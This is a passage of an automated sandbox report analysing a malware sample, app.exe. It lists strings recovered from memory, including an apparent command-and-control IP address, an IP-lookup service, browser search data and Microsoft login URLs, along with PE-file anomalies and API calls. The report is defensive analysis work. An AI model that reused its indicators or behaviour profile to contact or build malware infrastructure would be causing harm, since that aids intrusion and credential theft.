in binary or memory: http://144.208.127.230/
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/7
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103448637.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/B
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/J
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/U
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/Y
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/e&
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/v
Source: app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/z
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/~
Source: app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/-35b871f0a661
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/-35b871f0a661ozi
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/L
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/R
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/T
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/o
Source: app.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/w
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230U
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://POSTHTTP/1.1Content-Type:
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alldrivers4devices.net
Source: app.exe, 00000003.00000003.3246373817.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000913000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3294569055.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRJX35jqtu8qT267s2bDnzhp-lJVMQdhF5S6U4t
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRgJaQoM7DXWRt-dg7YoOenavsVCx2_mgiT8oFn
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcSFe5-1ue4YewDL7QTtYG5GBPfUy7h9iJ7t-0kd
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
Source: app.exe, 00000003.00000003.3183161453.00000000058D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/0
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: app.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;9
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashaert
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=at
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=autoit
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setupMicrosoft
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00424B38 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00424B38

System Summary

barindex
PE file contains section with special chars
Source: app.exeStatic PE information: section name: )m&
Source: app.exe.0.drStatic PE information: section name: )m&
PE file has a writeable .text section
Source: app.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: app.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C02D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_025C02D0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C77D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_025C77D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025902D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,3_2_025902D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025977D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,3_2_025977D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02579E36 AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtDeviceIoControlFile,RtlNtStatusToDosError,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,3_2_02579E36
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A44A: GetCurrentProcess,SetPriorityClass,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,0_2_0040A44A
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004092DE0_2_004092DE
